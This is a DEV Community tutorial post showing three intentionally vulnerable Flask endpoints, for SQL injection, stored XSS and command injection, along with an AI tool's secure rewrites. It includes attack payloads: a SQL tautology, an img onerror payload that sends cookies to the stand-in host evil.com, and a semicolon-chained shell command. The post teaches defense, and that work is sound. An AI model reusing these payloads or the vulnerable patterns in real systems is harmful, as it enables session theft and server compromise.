DEV Community: Pedro N The latest articles on DEV Community by Pedro N (@pedronino). https://dev.to/pedronino https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3866732%2F8fc31ffa-8349-4ffb-be43-33f20a9881b9.png DEV Community: Pedro N https://dev.to/pedronino en Kiro for Input Validation: Preventing Injection Attacks Pedro N Wed, 08 Apr 2026 02:23:31 +0000 https://dev.to/pedronino/kiro-for-input-validation-preventing-injection-attacks-2di9 https://dev.to/pedronino/kiro-for-input-validation-preventing-injection-attacks-2di9 <p>This is an idea that I've had for some time, and never had the chance to complete. But, It's 2026 and I still see examples and some production code that concatenates user input straight into SQL queries. No parameterization. No escaping. Just vibes and prayers.</p> <p>I decided to take three of the most common injection vulnerabilities, right from the textbook: SQL injection, cross-site scripting, and command injection, then write the worst possible version of each in Python (pun intended), and then ask <a href="https://kiro.dev" rel="noopener noreferrer">Kiro</a> to fix them. Here's what happened, in my own experience. </p> <h2> The Setup </h2> <p>I built three small Flask endpoints. Each one does something useful: search users, post comments, ping a host. Each one is dangerously vulnerable. The goal: paste the vulnerable code into Kiro and ask it to generate a secure version. No hand-holding, no deep dive about what's wrong. Just "fix this..."</p> <p>All examples use <strong>Python 3 + Flask</strong>. You can follow along with any text editor, but the screenshots below are from Kiro.</p> <h2> 1. SQL Injection: The Classic </h2> <p>Here's a user search endpoint. Can you Spot the problem?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/search</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_users</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">query</span> <span class="o">=</span> <span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = </span><span class="sh">'"</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="sh">"'"</span> <span class="n">results</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">([</span><span class="nf">dict</span><span class="p">(</span><span class="n">row</span><span class="p">)</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">results</span><span class="p">])</span> </code></pre> </div> <p>That <code>+</code> operator is doing a lot of damage. An attacker can send:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="o">/</span><span class="k">search</span><span class="o">?</span><span class="n">username</span><span class="o">=</span><span class="s1">' OR '</span><span class="mi">1</span><span class="s1">'='</span><span class="mi">1</span> </code></pre> </div> <p>And suddenly the query becomes <code>SELECT * FROM users WHERE username = '' OR '1'='1'</code> which returns every user in the database. Credentials, emails, roles. ALL of it.</p> <p><em>Visual Example of the vulnerability:</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwpwixh9brhiq4ehbsoe.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffwpwixh9brhiq4ehbsoe.png" alt=" " width="800" height="441"></a></p> <h3> What Kiro Did </h3> <p>I pasted the vulnerable code into Kiro and asked: <em>"This Flask endpoint is vulnerable to SQL injection. Can you fix it and explain why?"</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F46vw0az9i3odox93hmsn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F46vw0az9i3odox93hmsn.png" alt=" " width="800" height="822"></a></p> <p>Kiro immediately identified the string concatenation as the vulnerability and generated this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/search</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_users</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">username</span> <span class="ow">or</span> <span class="nf">len</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">100</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Invalid username</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">400</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">query</span> <span class="o">=</span> <span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = ?</span><span class="sh">"</span> <span class="n">results</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="n">query</span><span class="p">,</span> <span class="p">(</span><span class="n">username</span><span class="p">,)).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">([</span><span class="nf">dict</span><span class="p">(</span><span class="n">row</span><span class="p">)</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">results</span><span class="p">])</span> </code></pre> </div> <p><strong>What changed and why it matters:</strong></p> <ul> <li> <strong>Parameterized query</strong> (<code>?</code> placeholder) — the database treats the input as data, never as SQL code. This is the single most effective defense against SQL injection.</li> <li> <strong>Input validation</strong> — length check and empty check reject obviously bad input before it reaches the database.</li> <li>The attacker's <code>' OR '1'='1</code> payload now gets treated as a literal string to search for. No match, no data leak.</li> </ul> <p><em>Visual Example after the Fix:</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F36950gi77qehh049lsn0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F36950gi77qehh049lsn0.png" alt=" " width="800" height="243"></a></p> <p>This wraps up the first example. Not bad to start, right? </p> <p>Let's move on, we have more!</p> <h2> 2. Cross-Site Scripting (XSS): The Silent One </h2> <p>Here's a comment board that renders user input as HTML:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">comment_board</span><span class="p">():</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comment</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">:</span> <span class="n">name</span><span class="p">,</span> <span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">:</span> <span class="n">comment</span><span class="p">})</span> <span class="n">html</span> <span class="o">=</span> <span class="sh">"</span><span class="s">&lt;h1&gt;Comment Board&lt;/h1&gt;</span><span class="sh">"</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">comments</span><span class="p">:</span> <span class="n">html</span> <span class="o">+=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;p&gt;&lt;b&gt;</span><span class="si">{</span><span class="n">c</span><span class="p">[</span><span class="sh">'</span><span class="s">name</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="s">&lt;/b&gt;: </span><span class="si">{</span><span class="n">c</span><span class="p">[</span><span class="sh">'</span><span class="s">comment</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="s">&lt;/p&gt;</span><span class="sh">"</span> <span class="k">return</span> <span class="n">html</span> </code></pre> </div> <p>An attacker posts a comment with this as their name:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"document.location='http://evil.com/?c='+document.cookie"</span><span class="nt">&gt;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2dkey2aq8otwzllanday.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2dkey2aq8otwzllanday.png" alt=" " width="488" height="302"></a></p> <p>After click on "post..."</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq1v0f2nvdtm8v1r4e0wh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq1v0f2nvdtm8v1r4e0wh.png" alt=" " width="488" height="192"></a></p> <p>And then... Redirect stealing the cookie!</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lo5boyxwb8gvfwghzfv.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3lo5boyxwb8gvfwghzfv.png" alt=" " width="488" height="532"></a></p> <p>The browser tries to load a non-existent image, fails, and fires the <code>onerror</code> handler, which redirects every visitor to the attacker's server with their session cookies. This is <strong>stored XSS</strong>, the payload persists in the application and hits every user who views the page. Attackers use event handlers like <code>onerror</code> because browsers block inline <code>&lt;script&gt;</code> tags injected via HTML, but they can't block event attributes the same way.</p> <h3> What Kiro Did </h3> <p>I asked Kiro: <em>"This comment board has a stored XSS vulnerability. Generate a secure version."</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyg2uh20wu9oeyu6aq051.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyg2uh20wu9oeyu6aq051.png" alt=" " width="678" height="1296"></a></p> <p>Kiro rewrote the endpoint to use Jinja2 templates with auto-escaping:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template_string</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">TEMPLATE</span> <span class="o">=</span> <span class="sh">"""</span><span class="s"> &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt;&lt;meta charset=</span><span class="sh">"</span><span class="s">utf-8</span><span class="sh">"</span><span class="s">&gt;&lt;title&gt;Comment Board&lt;/title&gt;&lt;/head&gt; &lt;body&gt; &lt;h1&gt;Comment Board&lt;/h1&gt; &lt;form method=</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="s">&gt; &lt;input name=</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="s"> placeholder=</span><span class="sh">"</span><span class="s">Your name</span><span class="sh">"</span><span class="s"> maxlength=</span><span class="sh">"</span><span class="s">50</span><span class="sh">"</span><span class="s">&gt;&lt;br&gt; &lt;textarea name=</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="s"> placeholder=</span><span class="sh">"</span><span class="s">Your comment</span><span class="sh">"</span><span class="s"> maxlength=</span><span class="sh">"</span><span class="s">500</span><span class="sh">"</span><span class="s">&gt;&lt;/textarea&gt;&lt;br&gt; &lt;button type=</span><span class="sh">"</span><span class="s">submit</span><span class="sh">"</span><span class="s">&gt;Post&lt;/button&gt; &lt;/form&gt; &lt;hr&gt; {% for c in comments %} &lt;p&gt;&lt;b&gt;{{ c.name }}&lt;/b&gt;: {{ c.comment }}&lt;/p&gt; {% endfor %} &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">GET</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">comment_board</span><span class="p">():</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comment</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">name</span><span class="p">),</span> <span class="sh">"</span><span class="s">comment</span><span class="sh">"</span><span class="p">:</span> <span class="nf">escape</span><span class="p">(</span><span class="n">comment</span><span class="p">)})</span> <span class="k">return</span> <span class="nf">render_template_string</span><span class="p">(</span><span class="n">TEMPLATE</span><span class="p">,</span> <span class="n">comments</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <p><strong>What changed and why it matters:</strong></p> <ul> <li> <strong>Output escaping</strong> — <code>escape()</code> converts <code>&lt;script&gt;</code> into <code>&amp;lt;script&amp;gt;</code>, which renders as harmless text instead of executable code.</li> <li> <strong>Jinja2 auto-escaping</strong> — the <code>{{ }}</code> template syntax escapes output by default. Double protection.</li> <li> <strong>Input length limits</strong> — <code>maxlength</code> on the form fields and server-side validation reduce the attack surface.</li> <li>The attacker's script tag now displays as literal text on the page. No execution, no cookie theft.</li> </ul> <p>That's 2 out of 3. We're in a roll, so let's get to the last example for today:</p> <h2> 3. Command Injection: The Dangerous One </h2> <p>Here's a network diagnostic endpoint:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/ping</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">ping_host</span><span class="p">():</span> <span class="n">host</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">host</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">popen</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">ping -c 2 </span><span class="si">{</span><span class="n">host</span><span class="si">}</span><span class="sh">"</span><span class="p">).</span><span class="nf">read</span><span class="p">()</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;pre&gt;</span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="s">&lt;/pre&gt;</span><span class="sh">"</span> </code></pre> </div> <p>An attacker sends:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>/ping?host<span class="o">=</span>google.com<span class="p">;</span><span class="nb">whoami</span> </code></pre> </div> <p>And shows like this:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjhd55az4h5od5r11hgcs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjhd55az4h5od5r11hgcs.png" alt=" " width="800" height="258"></a><br> (Username section intentionally removed, hehe.)</p> <p>The shell interprets the semicolon as a command separator. It pings google.com, then runs the command and returns the contents. Chain a few more commands and the attacker owns your server!</p> <h3> What Kiro Did </h3> <p>I asked: <em>"This ping endpoint has a command injection vulnerability. Make it safe."</em></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekqgipkp7za753j3fl8s.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekqgipkp7za753j3fl8s.png" alt=" " width="800" height="655"></a><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">re</span> <span class="n">HOSTNAME_PATTERN</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nf">compile</span><span class="p">(</span><span class="sa">r</span><span class="sh">'</span><span class="s">^[a-zA-Z0-9._-]+$</span><span class="sh">'</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/ping</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">ping_host</span><span class="p">():</span> <span class="n">host</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">host</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">host</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">HOSTNAME_PATTERN</span><span class="p">.</span><span class="nf">match</span><span class="p">(</span><span class="n">host</span><span class="p">):</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Invalid hostname</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">400</span> <span class="k">try</span><span class="p">:</span> <span class="n">result</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span> <span class="p">[</span><span class="sh">"</span><span class="s">ping</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">-c</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">2</span><span class="sh">"</span><span class="p">,</span> <span class="n">host</span><span class="p">],</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">10</span> <span class="p">)</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;pre&gt;</span><span class="si">{</span><span class="n">result</span><span class="p">.</span><span class="n">stdout</span><span class="si">}</span><span class="s">&lt;/pre&gt;</span><span class="sh">"</span> <span class="k">except</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">TimeoutExpired</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Request timed out</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">504</span> </code></pre> </div> <p><strong>What changed and why it matters:</strong></p> <ul> <li> <strong>No shell</strong> — <code>subprocess.run()</code> with a list argument never invokes a shell. The semicolon trick doesn't work because there's no shell to interpret it.</li> <li> <strong>Input allowlisting</strong> — the regex only permits valid hostname characters. Semicolons, pipes, backticks — all rejected before they reach any system call.</li> <li> <strong>Timeout</strong> — prevents an attacker from hanging your server with a slow target.</li> <li>The attacker's <code>google.com;whoami</code> gets rejected by the regex. Even if it somehow got through, <code>subprocess.run</code> with a list would try to ping the literal string <code>google.com;whoami</code> — which isn't a valid hostname.</li> </ul> <h2> The Pattern </h2> <p>Across all three vulnerabilities, Kiro applied the same defensive layers:</p> <ol> <li> <strong>Validate input</strong> — reject anything that doesn't match expected patterns</li> <li> <strong>Use safe APIs</strong> — parameterized queries, template engines, subprocess without shell</li> <li> <strong>Limit scope</strong> — length limits, timeouts, allowlists over blocklists</li> </ol> <p>These aren't exotic techniques. They're fundamentals. But they're also the things that get skipped when you're moving fast. That's exactly where Kiro helps; it generates the secure version by default, so you don't have to remember every OWASP rule while you're in flow.</p> <h2> Now, Try It Yourself! </h2> <p>Grab the vulnerable examples from this post, open them in <a href="https://kiro.dev" rel="noopener noreferrer">Kiro</a>, and ask it to fix them. You might be surprised how much it catches; and how much faster you ship secure code when your IDE has your back.</p> ai python security webdev